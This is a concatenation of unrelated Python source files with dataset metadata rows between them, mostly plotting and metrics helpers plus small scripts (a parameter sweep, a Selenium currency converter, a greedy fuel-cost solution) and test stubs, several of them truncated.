        maximum_x = error_threshold + 1
        scale = num_bins / maximum_x
    x_axis = np.linspace(0, maximum_x, num_bins)            # error axis, percentage of normalization factor
    y_axis = np.zeros(num_bins)
    interval_y = 10
    interval_x = 1
    plt.xlim(0, error_threshold)
    plt.ylim(0, 100)
    plt.yticks(np.arange(0, 100 + interval_y, interval_y))
    plt.xticks(np.arange(0, error_threshold + interval_x, interval_x))
    plt.grid()
    plt.title(title, fontsize=20)
    if normalized: plt.xlabel('Normalized error euclidean distance (%)', fontsize=16)
    else: plt.xlabel('Absolute error euclidean distance', fontsize=16)

    # calculate metrics for each method
    num_methods = len(normed_mean_error_dict)
    # bugfix: dict_values is not subscriptable in python 3
    num_images = len(next(iter(normed_mean_error_dict.values())))
    metrics_dict = dict()
    metrics_table = list()
    table_title = ['Method Name / Metrics', 'AUC', 'MSE']
    append2title = False
    assert num_images > 0, 'number of error array should be larger than 0'
    for ordered_index in range(num_methods):
        method_name = display_list[ordered_index]
        normed_mean_error = normed_mean_error_dict[method_name]

        if debug:
            assert isnparray(normed_mean_error) and normed_mean_error.ndim == 1, 'shape of error distance is not good'
            assert len(normed_mean_error) == num_images, 'number of testing images should be equal for all methods'
            assert len(linestyle_set) * len(color_set) >= len(normed_mean_error_dict)
        color_tmp = color_set[color_index]
        line_tmp = linestyle_set[line_index]

        # cumulative distribution: fraction of samples whose error is below each x value
        for i in range(num_bins):
            y_axis[i] = float((normed_mean_error < x_axis[i]).sum()) / num_images

        # calculate area under the curve and mean square error
        # (slice bounds wrapped in int() so the indexing also works with true division)
        entry = dict()
        entry['AUC'] = np.sum(y_axis[:int(error_threshold * scale)]) / (error_threshold * scale)    # bigger, better
        entry['MSE'] = np.mean(normed_mean_error)                                                   # smaller, better
        metrics_table_tmp = [str(method_name), '%.2f' % (entry['AUC']), '%.1f' % (entry['MSE'])]
        if truncated_list is not None:
            tmse_dict = calculate_truncated_mse(normed_mean_error.tolist(), truncated_list, debug=debug)
            for threshold in truncated_list:
                # NOTE(review): kept identical to the overall AUC, as in the original metric definition
                entry['AUC/%s'%threshold] = np.sum(y_axis[:int(error_threshold * scale)]) / (error_threshold * scale)
                entry['MSE/%s'%threshold] = tmse_dict[threshold]['T-MSE']
                entry['percentage/%s'%threshold] = tmse_dict[threshold]['percentage']

                if not append2title:
                    table_title.append('AUC/%s'%threshold)
                    table_title.append('MSE/%s'%threshold)
                    table_title.append('pct/%s'%threshold)
                metrics_table_tmp.append('%.2f' % (entry['AUC/%s'%threshold]))
                metrics_table_tmp.append('%.1f' % (entry['MSE/%s'%threshold]))
                metrics_table_tmp.append('%.1f' % (100 * entry['percentage/%s'%threshold]) + '%')

        metrics_table.append(metrics_table_tmp)
        append2title = True
        metrics_dict[method_name] = entry

        # draw the curve for this method
        label = '%s, AUC: %.2f, MSE: %.1f (%.0f um)' % (method_name, entry['AUC'], entry['MSE'], entry['MSE'] * scale_distance)
        if normalized: plt.plot(x_axis*100, y_axis*100, color=color_tmp, linestyle=line_tmp, label=label, lw=3)
        else: plt.plot(x_axis, y_axis*100, color=color_tmp, linestyle=line_tmp, label=label, lw=3)
        plt.legend(loc=4, fontsize=legend_fontsize)

        # cycle through all colors first, then move to the next line style
        color_index += 1
        if color_index // len(color_set) == 1:
            line_index += 1
            color_index = color_index % len(color_set)

    plt.ylabel('{} Test Images (%)'.format(num_images), fontsize=16)
    save_vis_close_helper(fig=fig, ax=None, vis=vis, transparent=False, save_path=pck_savepath, debug=debug, closefig=closefig)

    # print table to terminal
    metrics_table = [table_title] + metrics_table
    table = AsciiTable(metrics_table)
    if display2terminal:
        print('\nprint detailed metrics')
        print(table.table)

    # save table to file (context manager guarantees the file is closed)
    if table_savepath is not None:
        with open(table_savepath, 'w') as table_file:
            table_file.write(table.table)
        if display2terminal: print('\nsave detailed metrics to %s' % table_savepath)
    return metrics_dict, metrics_table
def visualize_nearest_neighbor(featuremap_dict, num_neighbor=5, top_number=5, vis=True, save_csv=False, csv_save_path=None, save_vis=False, save_img=False, save_thumb_name='nearest_neighbor.png', img_src_folder=None, ext_filter='.jpg', nn_save_folder=None, debug=True):
    '''
    visualize nearest neighbor for featuremap from images

    NOTE(review): this function depends on sklearn.neighbors.NearestNeighbors, whose
    import is commented out at the top of this file, and on os / shutil / imread /
    mkdir_if_missing which are not imported in this file either — as written it
    raises NameError at runtime; confirm the intended imports before use.

    parameter:
        featuremap_dict: a dictionary contains image path as key, and featuremap as value, the featuremap needs to be numpy array with any shape. No flatten needed
        num_neighbor: number of neighbor to visualize, the first nearest is itself
        top_number: number of top to visualize, since there might be tons of featuremap (length of dictionary), we choose the top ten with lowest distance with their nearest neighbor
        csv_save_path: path to save .csv file which contains indices and distance array for all elements
        nn_save_folder: save the nearest neighbor images for top featuremap

    return:
        all_sorted_nearest_id: a 2d matrix, each row is a feature followed by its nearest neighbor in whole feature dataset, the column is sorted by the distance of all nearest neighbor each row
        selected_nearest_id: only top number of sorted nearest id
    '''
    print('processing feature map to nearest neightbor.......')
    if debug:
        assert isdict(featuremap_dict), 'featuremap should be dictionary'
        assert all(isnparray(featuremap_tmp) for featuremap_tmp in featuremap_dict.values()), 'value of dictionary should be numpy array'
        assert isinteger(num_neighbor) and num_neighbor > 1, 'number of neighborhodd is an integer larger than 1'
        if save_csv and csv_save_path is not None:
            assert is_path_exists_or_creatable(csv_save_path), 'path to save .csv file is not correct'

        if save_vis or save_img:
            if nn_save_folder is not None:  # save image directly
                assert isstring(ext_filter), 'extension filter is not correct'
                assert is_path_exists(img_src_folder), 'source folder for image is not correct'
                assert all(isstring(path_tmp) for path_tmp in featuremap_dict.keys())     # key should be the path for the image
                assert is_path_exists_or_creatable(nn_save_folder), 'folder to save top visualized images is not correct'
                assert isstring(save_thumb_name), 'name of thumbnail is not correct'

    # normalize the extension filter to start with a dot
    if ext_filter.find('.') == -1:
        ext_filter = '.%s' % ext_filter

    # flatten the feature map so every feature is a 1-d vector
    nn_feature_dict = dict()
    for key, featuremap_tmp in featuremap_dict.items():
        nn_feature_dict[key] = featuremap_tmp.flatten()
    num_features = len(nn_feature_dict)

    # nearest neighbor search over all flattened features
    # NOTE(review): dict.values() ordering is relied upon to match id_list below;
    # python 2 style — in python 3 this needs list() conversions
    featuremap = np.array(nn_feature_dict.values())
    nearbrs = NearestNeighbors(n_neighbors=num_neighbor, algorithm='ball_tree').fit(featuremap)
    distances, indices = nearbrs.kneighbors(featuremap)
    if debug:
        assert featuremap.shape[0] == num_features, 'shape of feature map is not correct'
        assert indices.shape == (num_features, num_neighbor), 'shape of indices is not correct'
        assert distances.shape == (num_features, num_neighbor), 'shape of indices is not correct'

    # convert the nearest indices for all featuremap to the key accordingly
    id_list = nn_feature_dict.keys()
    max_length = len(max(id_list, key=len))                 # find the maximum length of string in the key
    nearest_id = np.chararray(indices.shape, itemsize=max_length+1)
    for x in range(nearest_id.shape[0]):
        for y in range(nearest_id.shape[1]):
            nearest_id[x, y] = id_list[indices[x, y]]

    if debug:
        assert list(nearest_id[:, 0]) == id_list, 'nearest neighbor has problem'

    # sort the feature based on distance
    print('sorting the feature based on distance')
    featuremap_distance = np.sum(distances, axis=1)
    if debug:
        assert featuremap_distance.shape == (num_features, ), 'distance is not correct'
    sorted_indices = np.argsort(featuremap_distance)
    all_sorted_nearest_id = nearest_id[sorted_indices, :]

    # save to the csv file: distance matrix first, then the sorted neighbor ids
    if save_csv and csv_save_path is not None:
        print('Saving nearest neighbor result as .csv to path: %s' % csv_save_path)
        with open(csv_save_path, 'w+') as file:
            np.savetxt(file, distances, delimiter=',', fmt='%f')
            np.savetxt(file, all_sorted_nearest_id, delimiter=',', fmt='%s')
            file.close()

    # choose the best (lowest total neighbor distance) to visualize
    selected_sorted_indices = sorted_indices[0:top_number]
    if debug:
        for i in range(num_features-1):
            assert featuremap_distance[sorted_indices[i]] < featuremap_distance[sorted_indices[i+1]], 'feature map is not well sorted based on distance'
    selected_nearest_id = nearest_id[selected_sorted_indices, :]

    # draw a grid: one row per selected feature, one column per neighbor
    if save_vis:
        fig, axarray = plt.subplots(top_number, num_neighbor)
        for index in range(top_number):
            for nearest_index in range(num_neighbor):
                img_path = os.path.join(img_src_folder, '%s%s'%(selected_nearest_id[index, nearest_index], ext_filter))
                if debug:
                    print('loading image from %s'%img_path)
                img = imread(img_path)
                if isgrayimage_dimension(img):
                    axarray[index, nearest_index].imshow(img, cmap='gray')
                elif iscolorimage_dimension(img):
                    axarray[index, nearest_index].imshow(img)
                else:
                    assert False, 'unknown error'
                axarray[index, nearest_index].axis('off')
        save_thumb = os.path.join(nn_save_folder, save_thumb_name)
        fig.savefig(save_thumb)
        if vis:
            plt.show()
        plt.close(fig)

    # copy the top neighbor images into one sub-folder per selected feature
    if save_img and nn_save_folder is not None:
        for top_index in range(top_number):
            file_list = selected_nearest_id[top_index]
            save_subfolder = os.path.join(nn_save_folder, file_list[0])
            mkdir_if_missing(save_subfolder)
            for file_tmp in file_list:
                file_src = os.path.join(img_src_folder, '%s%s'%(file_tmp, ext_filter))
                save_path = os.path.join(save_subfolder, '%s%s'%(file_tmp, ext_filter))
                if debug:
                    print('saving %s to %s' % (file_src, save_path))
                shutil.copyfile(file_src, save_path)

    return all_sorted_nearest_id, selected_nearest_id
def visualize_distribution(data, bin_size=None, vis=False, save_path=None, debug=True, closefig=True):
    '''
    visualize the histogram of a data, which can be a dictionary, list, numpy array,
    tuple, or a list of list (one translucent histogram per sub-list)

    parameters:
        data:       values to histogram; a dictionary contributes its values
        bin_size:   width of each histogram bin; derived from the data range when None
    returns:        whatever save_vis_close_helper returns for the produced figure
    '''
    if debug:
        assert istuple(data) or isdict(data) or islist(data) or isnparray(data), 'input data is not correct'

    # convert data type to a plain list
    if istuple(data):
        data = list(data)
    elif isdict(data):
        # bugfix: dict_values is not a list in python 3; materialize it
        data = list(data.values())
    elif isnparray(data):
        data = data.tolist()

    num_bins = 1000.0
    fig, ax = get_fig_ax_helper(fig=None, ax=None)

    # calculate bin size from the global value range when not provided
    if bin_size is None:
        if islistoflist(data):
            max_value = np.max(np.max(data))
            min_value = np.min(np.min(data))
        else:
            max_value = np.max(data)
            min_value = np.min(data)
        bin_size = (max_value - min_value) / num_bins
    else:
        try:
            bin_size = float(bin_size)
        except TypeError:
            print('size of bin should be an float value')

    # plot
    if islistoflist(data):
        max_value = np.max(np.max(data))
        min_value = np.min(np.min(data))
        bins = np.arange(min_value - bin_size, max_value + bin_size, bin_size)          # fixed bin size
        plt.xlim([min_value - bin_size, max_value + bin_size])
        for data_list_tmp in data:
            if debug:
                assert islist(data_list_tmp), 'the nested list is not correct!'
            # bugfix: the seaborn import is disabled at the top of this file, so
            # sns.distplot raised a NameError; draw a translucent matplotlib
            # histogram instead (same bins, as in the originally commented-out line)
            plt.hist(data_list_tmp, bins=bins, alpha=0.3)
    else:
        bins = np.arange(min(data) - 10 * bin_size, max(data) + 10 * bin_size, bin_size)    # fixed bin size
        plt.xlim([min(data) - bin_size, max(data) + bin_size])
        plt.hist(data, bins=bins, alpha=0.5)
    plt.title('distribution of data')
    plt.xlabel('data (bin size = %f)' % bin_size)
    plt.ylabel('count')

    return save_vis_close_helper(fig=fig, ax=ax, vis=vis, save_path=save_path, debug=debug, closefig=closefig)
def visualize_bar(data, bin_size=2.0, title='Bar Graph of Key-Value Pair', xlabel='index', ylabel='count', vis=True, save_path=None, debug=True, closefig=True):
    '''
    visualize the bar graph of a data, which can be a dictionary or a list
    different from visualize_bar_graph, this function does not depend on pandas
    dataframes; it is simpler but with less functionality
    also the keys taken by this function are continuous scalar variables

    parameters:
        data:       dict mapping scalar keys to counts, or a list of counts (indexed 0..n-1)
        bin_size:   width of each bar
    returns:        whatever save_vis_close_helper returns for the produced figure
    '''
    if debug:
        assert isstring(title) and isstring(xlabel) and isstring(ylabel), 'title/xlabel/ylabel is not correct'
        assert isdict(data) or islist(data), 'input data is not correct'
        assert isscalar(bin_size), 'the bin size is not a floating number'

    if isdict(data):
        # bugfix: python 3 dict views are neither lists nor indexable; materialize them
        index_list = list(data.keys())
        if debug:
            # bugfix: islistofscalar was referenced but never imported; check with isscalar
            assert all(isscalar(index_tmp) for index_tmp in index_list), 'the input dictionary does not contain a scalar key'
        frequencies = list(data.values())
    else:
        index_list = list(range(len(data)))
        frequencies = data

    index_str_list = scalarlist2strlist(index_list, debug=debug)
    index_list = np.array(index_list)
    fig, ax = get_fig_ax_helper(fig=None, ax=None)
    # ax.set_xticks(index_list)
    # ax.set_xticklabels(index_str_list)
    plt.bar(index_list, frequencies, bin_size, color='r', alpha=0.5)
    plt.title(title, fontsize=20)
    plt.xlabel(xlabel)
    plt.ylabel(ylabel)

    return save_vis_close_helper(fig=fig, ax=ax, vis=vis, save_path=save_path, debug=debug, transparent=False, closefig=closefig)
def visualize_bar_graph(data, title='Bar Graph of Key-Value Pair', xlabel='pixel error', ylabel='keypoint index', label=False, label_list=None, vis=True, save_path=None, debug=True, closefig=True):
    '''
    visualize the bar graph of a data, which can be a dictionary or list of dictionary
    inside each dictionary, the keys (string) should be the same which is the y label, the values should be scalar

    parameters:
        data:       dict mapping str -> scalar, or a list of such dicts
                    (all dicts must share exactly the same keys)
        label:      if True, label_list supplies one legend entry per input dict
    returns:
        whatever save_vis_close_helper returns for this figure
    '''
    if debug:
        assert isstring(title) and isstring(xlabel) and isstring(ylabel), 'title/xlabel/ylabel is not correct'
        assert isdict(data) or islistofdict(data), 'input data is not correct'
        if isdict(data):
            assert all(isstring(key_tmp) for key_tmp in data.keys()), 'the keys are not all strings'
            assert all(isscalar(value_tmp) for value_tmp in data.values()), 'the values are not all scalars'
        else:
            assert len(data) <= len(color_set), 'number of data set is larger than number of color to use'
            keys = sorted(data[0].keys())
            for dict_tmp in data:
                if not (sorted(dict_tmp.keys()) == keys):
                    print(dict_tmp.keys())
                    print(keys)
                    assert False, 'the keys are not equal across different input set'
                assert all(isstring(key_tmp) for key_tmp in dict_tmp.keys()), 'the keys are not all strings'
                assert all(isscalar(value_tmp) for value_tmp in dict_tmp.values()), 'the values are not all scalars'
    # convert dictionary to DataFrame, rows sorted by key name
    data_new = dict()
    if isdict(data):
        # list() is required: Python 3 dict views are not indexable (key_list[k])
        key_list = list(data.keys())
        sorted_index = sorted(range(len(key_list)), key=lambda k: key_list[k])
        data_new['names'] = (np.asarray(key_list)[sorted_index]).tolist()
        data_new['values'] = (np.asarray(list(data.values()))[sorted_index]).tolist()
    else:
        key_list = list(data[0].keys())
        sorted_index = sorted(range(len(key_list)), key=lambda k: key_list[k])
        data_new['names'] = (np.asarray(key_list)[sorted_index]).tolist()
        num_sets = len(data)
        for set_index in range(num_sets):
            data_new['value_%03d' % set_index] = (np.asarray(list(data[set_index].values()))[sorted_index]).tolist()
    dataframe = DataFrame(data_new)
    # plot
    width = 2000
    height = 2000
    alpha = 0.5
    # NOTE(review): dpi is assumed to be a module-level constant -- confirm it is
    # defined at file scope in the full source
    figsize = width / float(dpi), height / float(dpi)
    fig = plt.figure(figsize=figsize)
    sns.set(style='whitegrid')
    if isdict(data):
        sns.barplot(x='values', y='names', data=dataframe, label='data', color='b')
        plt.legend(ncol=1, loc='lower right', frameon=True, fontsize=5)
    else:
        num_sets = len(data)
        for set_index in range(num_sets):
            # first data set uses pastel colors, the rest use muted colors
            if set_index == 0:
                sns.set_color_codes('pastel')
            else:
                sns.set_color_codes('muted')
            if label:
                sns.barplot(x='value_%03d' % set_index, y='names', data=dataframe, label=label_list[set_index], color=color_set[set_index], alpha=alpha)
            else:
                # fixed typo: 'solor_set' -> 'color_set' (was a NameError on this branch)
                sns.barplot(x='value_%03d' % set_index, y='names', data=dataframe, color=color_set[set_index], alpha=alpha)
        plt.legend(ncol=len(data), loc='lower right', frameon=True, fontsize=5)
    sns.despine(left=True, bottom=True)
    plt.title(title, fontsize=20)
    plt.xlim([0, 50])  # NOTE: x-axis range is hard-coded to [0, 50]
    plt.xlabel(xlabel)
    plt.ylabel(ylabel)
    # shrink the y tick labels as the number of rows grows so they stay readable
    num_yticks = len(data_new['names'])
    adaptive_fontsize = -0.0555556 * num_yticks + 15.111
    plt.yticks(fontsize=adaptive_fontsize)
    return save_vis_close_helper(fig=fig, vis=vis, save_path=save_path, debug=debug, closefig=closefig)
49b2849f5a27a9f4b798aac2f6c1149060ada338 | 96 | py | Python | first_project/pizza_store/apps.py | itamaro/django-zero-to-cloud | 0b0a4f75bf6a27855b00a88aebf93471a38e0c3c | [
"Apache-2.0"
] | null | null | null | first_project/pizza_store/apps.py | itamaro/django-zero-to-cloud | 0b0a4f75bf6a27855b00a88aebf93471a38e0c3c | [
"Apache-2.0"
] | null | null | null | first_project/pizza_store/apps.py | itamaro/django-zero-to-cloud | 0b0a4f75bf6a27855b00a88aebf93471a38e0c3c | [
"Apache-2.0"
] | null | null | null | from django.apps import AppConfig
| 16 | 34 | 0.770833 |
49b384eb266010cb19d2dcb98f62539f08a56ecd | 2,530 | py | Python | bin/sweep_rhoref.py | lukaselflein/sarah_folderstructure | a725271db3d8b5b28b24918b3daf0942fa04dcd8 | [
"MIT"
] | null | null | null | bin/sweep_rhoref.py | lukaselflein/sarah_folderstructure | a725271db3d8b5b28b24918b3daf0942fa04dcd8 | [
"MIT"
] | 28 | 2019-03-29T13:34:57.000Z | 2019-07-04T09:27:07.000Z | bin/sweep_rhoref.py | lukaselflein/sarah_folderstructure | a725271db3d8b5b28b24918b3daf0942fa04dcd8 | [
"MIT"
] | null | null | null | """Vary the rhoref parameter to find a sane value.
Copyright 2019 Simulation Lab
University of Freiburg
Author: Lukas Elflein <elfleinl@cs.uni-freiburg.de>
"""
from __future__ import print_function
import os
import shutil
#import multiprocessing
#import sys
import random
from loop_cost_functions import calc_cost_function
from smamp.tools import cd
from smamp.tools import check_existence
def get_tasks(path_to_subdir):
    """Vary the lnrho weighting parameter, create folder and execute.

    Builds the work list of (subdir, lnrho, sigma, output_file) tuples for
    every parameter combination whose result file does not exist yet, so a
    previously interrupted sweep can be resumed.
    """
    sweep_dir = 'lnrho_sweep'
    if not os.path.exists(sweep_dir):
        print('making dir')
        os.mkdir(sweep_dir)
        print('dir made.')

    sigma_values = [0.2, 0.4, 0.6, 0.8, 1.0, 1.2, 1.4]
    lnrho_values = [-7, -6, -5.5, -5, -4.75, -4.5, -4.25, -4, -3.5]

    tasks = []
    n_skipped = 0
    for sigma in sigma_values:
        for lnrho in lnrho_values:
            result_file = os.path.join(sweep_dir, 'cost_{}_{}.h5'.format(lnrho, sigma))
            # existing result files are counted but not recomputed
            if os.path.exists(result_file):
                n_skipped += 1
            else:
                tasks.append((path_to_subdir, lnrho, sigma, result_file))
    print('{} files found and skipped.'.format(n_skipped))
    return tasks
def main():
    """ Execute everything."""
    print('This is {}.'.format(__file__))
    print('Current working dir: {}'.format(os.getcwd()))
    excluded_tokens = ('template', 'exclude', 'lnrho_sweep')
    tasks = []
    # Crawl the directory tree and collect work items from every
    # horton_cost_function folder that is not excluded.
    for subdir, dirs, files in sorted(os.walk('.')):
        if any(token in subdir for token in excluded_tokens):
            continue
        if 'horton_cost_function' not in subdir:
            continue
        print('Moving to {}'.format(subdir))
        with cd(subdir):
            tasks.extend(get_tasks(subdir))
    calculate_tasks(tasks)
    print('Done.')


if __name__ == '__main__':
    main()
| 28.75 | 84 | 0.617787 |
49b5f0ea075bbb7b79a2d40b2e4b0bdffec0743f | 12,388 | py | Python | weasyl/test/web/test_site_updates.py | sl1-1/weasyl | d4f6bf3e33b85a2289a451d95d5b90ff24f5d539 | [
"Apache-2.0"
] | 1 | 2019-02-15T04:21:48.000Z | 2019-02-15T04:21:48.000Z | weasyl/test/web/test_site_updates.py | sl1-1/weasyl | d4f6bf3e33b85a2289a451d95d5b90ff24f5d539 | [
"Apache-2.0"
] | 254 | 2017-12-23T19:36:43.000Z | 2020-04-14T21:46:13.000Z | weasyl/test/web/test_site_updates.py | sl1-1/weasyl | d4f6bf3e33b85a2289a451d95d5b90ff24f5d539 | [
"Apache-2.0"
] | 1 | 2017-12-23T18:42:16.000Z | 2017-12-23T18:42:16.000Z | from __future__ import absolute_import, unicode_literals
import pytest
from libweasyl import staff
from libweasyl.legacy import UNIXTIME_OFFSET
from weasyl import errorcode
from weasyl import siteupdate
from weasyl.define import sessionmaker
from weasyl.test import db_utils
_FORM = {
u'title': u'Title',
u'content': u'Content',
}
| 39.705128 | 144 | 0.690265 |
49b63c647e63040901947f17755b744a1b67eb27 | 298 | py | Python | 17_Greedy/Step05/gamjapark.py | StudyForCoding/BEAKJOON | 84e1c5e463255e919ccf6b6a782978c205420dbf | [
"MIT"
] | null | null | null | 17_Greedy/Step05/gamjapark.py | StudyForCoding/BEAKJOON | 84e1c5e463255e919ccf6b6a782978c205420dbf | [
"MIT"
] | 3 | 2020-11-04T05:38:53.000Z | 2021-03-02T02:15:19.000Z | 17_Greedy/Step05/gamjapark.py | StudyForCoding/BEAKJOON | 84e1c5e463255e919ccf6b6a782978c205420dbf | [
"MIT"
] | null | null | null | import sys
# Greedy: drive every leg on the cheapest fuel price seen so far.
city_count = int(sys.stdin.readline())
leg_distances = list(map(int, sys.stdin.readline().split()))
fuel_prices = list(map(int, sys.stdin.readline().split()))

cheapest_price = fuel_prices[0]
total_cost = leg_distances[0] * cheapest_price
for city in range(1, city_count - 1):
    cheapest_price = min(cheapest_price, fuel_prices[city])
    total_cost += leg_distances[city] * cheapest_price
print(total_cost)
49b84672d25848b03244c392641967f515178752 | 1,395 | py | Python | examples/tx_rpc_client_ssl.py | jakm/txmsgpackrpc | 9ff15fd7a7cd412d246d4e4937a5c56365f0d6be | [
"MIT"
] | 18 | 2015-01-19T15:27:02.000Z | 2018-12-29T17:30:36.000Z | examples/tx_rpc_client_ssl.py | jakm/txmsgpackrpc | 9ff15fd7a7cd412d246d4e4937a5c56365f0d6be | [
"MIT"
] | 6 | 2015-05-27T11:28:18.000Z | 2016-12-19T06:35:55.000Z | examples/tx_rpc_client_ssl.py | jakm/txmsgpackrpc | 9ff15fd7a7cd412d246d4e4937a5c56365f0d6be | [
"MIT"
] | 4 | 2015-03-24T22:18:27.000Z | 2018-02-05T18:12:45.000Z | from twisted.internet import defer, reactor
if __name__ == '__main__':
    # Schedule main() to run once the Twisted reactor starts, then enter the
    # event loop (reactor.run() blocks until reactor.stop() is called).
    # NOTE(review): `main` is not defined in this excerpt -- presumably the
    # example's entry function defined earlier in the full file; confirm upstream.
    reactor.callWhenRunning(main)
    reactor.run()
| 27.352941 | 87 | 0.387097 |
49ba5224fd8503eb5f417c4656d1970b4252f78d | 714 | py | Python | currency_converter.py | patricianicolentan/currency-converters | e398796c99a0bb2a16fba9888baed0e289884237 | [
"MIT"
] | null | null | null | currency_converter.py | patricianicolentan/currency-converters | e398796c99a0bb2a16fba9888baed0e289884237 | [
"MIT"
] | null | null | null | currency_converter.py | patricianicolentan/currency-converters | e398796c99a0bb2a16fba9888baed0e289884237 | [
"MIT"
] | null | null | null | # Converts user-defined currencies using Google
import webbrowser, os, selenium
from selenium import webdriver
driver = webdriver.Firefox()
headers = {'User-Agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36'}
currencyX = input("Original Currency: ")
currencyYname = input("Output Currency: ")
currencyX_value = input("Value in " + currencyX + ": ")
URL = 'https://www.google.com/search?client=firefox-b-d&q=' + currencyX_value + ' ' + currencyX + ' to ' + currencyYname
driver.get(URL)
goal = driver.find_element_by_class_name('SwHCTb')
currencyY = goal.text
print('Value in ' + currencyYname + ': ' + currencyY) | 39.666667 | 149 | 0.710084 |
49bc98db6539f3a16066fd5753ae5ccc2e439eb8 | 1,107 | py | Python | tests/test_dht.py | fakegit/stilio | cf198b8ccadc7dcadc462ce83b801af00ef4e2f2 | [
"Apache-2.0"
] | 71 | 2019-10-09T17:18:12.000Z | 2022-02-26T12:15:53.000Z | tests/test_dht.py | zinsking/stilio | eade3c1993e185bef53fa25b4e12fe8be330251c | [
"Apache-2.0"
] | 3 | 2019-10-16T17:52:48.000Z | 2021-12-01T16:50:18.000Z | tests/test_dht.py | zinsking/stilio | eade3c1993e185bef53fa25b4e12fe8be330251c | [
"Apache-2.0"
] | 11 | 2020-01-21T09:09:14.000Z | 2022-03-27T12:05:36.000Z | from stilio.crawler.dht.node import Node
| 31.628571 | 60 | 0.581752 |
49bd3fd869f70ef4d24196d954aa248d999405b6 | 714 | py | Python | 04_threading_yield.py | BiAPoL/online_image_processing_napari | 680d9ceeef5ae188541a96c7125f0fca07f28af5 | [
"Unlicense"
] | 2 | 2021-05-10T13:44:15.000Z | 2022-03-16T20:20:39.000Z | 04_threading_yield.py | BiAPoL/online_image_processing_napari | 680d9ceeef5ae188541a96c7125f0fca07f28af5 | [
"Unlicense"
] | 1 | 2021-05-17T16:11:54.000Z | 2021-05-19T19:38:50.000Z | 04_threading_yield.py | BiAPoL/online_image_processing_napari | 680d9ceeef5ae188541a96c7125f0fca07f28af5 | [
"Unlicense"
] | 2 | 2021-05-17T16:36:12.000Z | 2022-03-18T15:07:14.000Z | import napari
import time
from napari._qt.qthreading import thread_worker
import numpy as np
# create a viewer window
viewer = napari.Viewer()
# https://napari.org/guides/stable/threading.html
def update_layer(image):
    """
    Updates the image in the layer 'result'
    or adds this layer.

    Parameters
    ----------
    image : array-like
        Image yielded by the worker; replaces the current data of the
        'result' layer in the module-level napari ``viewer``.
    """
    # EAFP: try to update the existing layer in place first; napari's layer
    # list raises KeyError when no layer with that name exists yet.
    try:
        viewer.layers['result'].data = image
    except KeyError:
        # first yield from the worker: create the layer instead
        viewer.add_image(image, name='result')
# Start the loop
worker = loop_run()
worker.yielded.connect(update_layer)
worker.start()
# Start napari
napari.run()
| 20.4 | 49 | 0.676471 |
49bec7c54696e35577e6576d879d884656bd76e8 | 1,937 | py | Python | wordonhd/ApiException.py | Mechazawa/WordOn-HD-Bot | d5a9dedd3d548ad1a9b33f49646e532bf511dd3e | [
"BSD-2-Clause"
] | null | null | null | wordonhd/ApiException.py | Mechazawa/WordOn-HD-Bot | d5a9dedd3d548ad1a9b33f49646e532bf511dd3e | [
"BSD-2-Clause"
] | null | null | null | wordonhd/ApiException.py | Mechazawa/WordOn-HD-Bot | d5a9dedd3d548ad1a9b33f49646e532bf511dd3e | [
"BSD-2-Clause"
] | null | null | null | from enum import Enum
from requests import Response
from urllib.parse import unquote
import json
| 28.485294 | 87 | 0.661848 |
49c08ac397715e801d537d9aef1fa2cc32d852d3 | 3,915 | py | Python | composite.py | ubuviz/vizion-composite-key | c8b549bb158fe64013d3db2074e3330a942509ab | [
"MIT"
] | null | null | null | composite.py | ubuviz/vizion-composite-key | c8b549bb158fe64013d3db2074e3330a942509ab | [
"MIT"
] | null | null | null | composite.py | ubuviz/vizion-composite-key | c8b549bb158fe64013d3db2074e3330a942509ab | [
"MIT"
] | 1 | 2021-06-27T15:49:18.000Z | 2021-06-27T15:49:18.000Z | """
This module provides a ``CompositePKModel`` which allows for basic retrieval
and saving of models with composite keys.
It is limited to the above tasks, and any use of the model past this is not
guaranteed to work.
A model with composite PK should look something like this::
from composite_pk import composite
class Lot(composite.CompositePKModel):
auction = models.ForeignKey(Auction, primary_key=True)
lot_number = models.IntegerField(primary_key=True)
objects = composite.CompositePKManager()
So it must:
* subclass the ``CompositePKModel``,
* have two or more fields which set the ``primary_key`` attribute to True,
and
* use the ``CompositePKManager`` as the initial manager.
"""
__version__ = "1.0.1"
__author__ = "Ubuviz"
from django.db import models
from django.db.models.base import ModelBase
| 32.090164 | 89 | 0.614049 |
49c27444ea8191b6871d22350e36ce9770315509 | 752 | py | Python | qurry/libraries/standard_library/constructs/gaussian.py | LSaldyt/curry | 9004a396ec2e351aa143a10a53156649a6747343 | [
"MIT"
] | 11 | 2018-07-28T17:08:23.000Z | 2019-02-08T03:04:03.000Z | qurry/libraries/standard_library/constructs/gaussian.py | LSaldyt/Qurry | 9004a396ec2e351aa143a10a53156649a6747343 | [
"MIT"
] | 33 | 2019-07-09T09:46:44.000Z | 2019-09-23T23:44:37.000Z | qurry/libraries/standard_library/constructs/gaussian.py | LSaldyt/Qurry | 9004a396ec2e351aa143a10a53156649a6747343 | [
"MIT"
] | 4 | 2019-05-28T01:27:49.000Z | 2019-12-26T18:01:51.000Z | from math import erf, sqrt
from functools import partial
from ..library.multinomial import multinomial, to_multinomial
def gaussian(mu, sigma, block, kernel=None):
    '''
    Construct to create a discrete approximation of the gaussian distribution using mu and sigma
    (gaussian 0 1 blocka)
    '''
    # Discretize the distribution on [-3, 3] with 64 bins via the inner
    # multinomial(...) call, then wrap the result in an outer multinomial
    # shifted by `offset=block` and bound to the kernel's definitions.
    # NOTE(review): `gaussian_cdfp` is not visible in this excerpt -- presumably
    # a CDF-based probability helper; confirm against the full module.
    # NOTE(review): `kernel` defaults to None but `kernel.definitions` is always
    # dereferenced, so omitting it raises AttributeError -- confirm callers
    # always pass a kernel.
    return multinomial(*multinomial(-3, 3, 64, gaussian_cdfp(float(mu), float(sigma))), offset=block, definitions=kernel.definitions)
| 34.181818 | 133 | 0.668883 |
49c3520395affa81361da9069657257acb15bac3 | 8,299 | py | Python | tmac/models.py | Nondairy-Creamer/tmac | d688b58f13f398f83ea0bdad139e69b74398c1be | [
"MIT"
] | null | null | null | tmac/models.py | Nondairy-Creamer/tmac | d688b58f13f398f83ea0bdad139e69b74398c1be | [
"MIT"
] | null | null | null | tmac/models.py | Nondairy-Creamer/tmac | d688b58f13f398f83ea0bdad139e69b74398c1be | [
"MIT"
] | null | null | null | import numpy as np
import torch
import time
from scipy import optimize
from scipy.stats import norm
import tmac.probability_distributions as tpd
import tmac.fourier as tfo
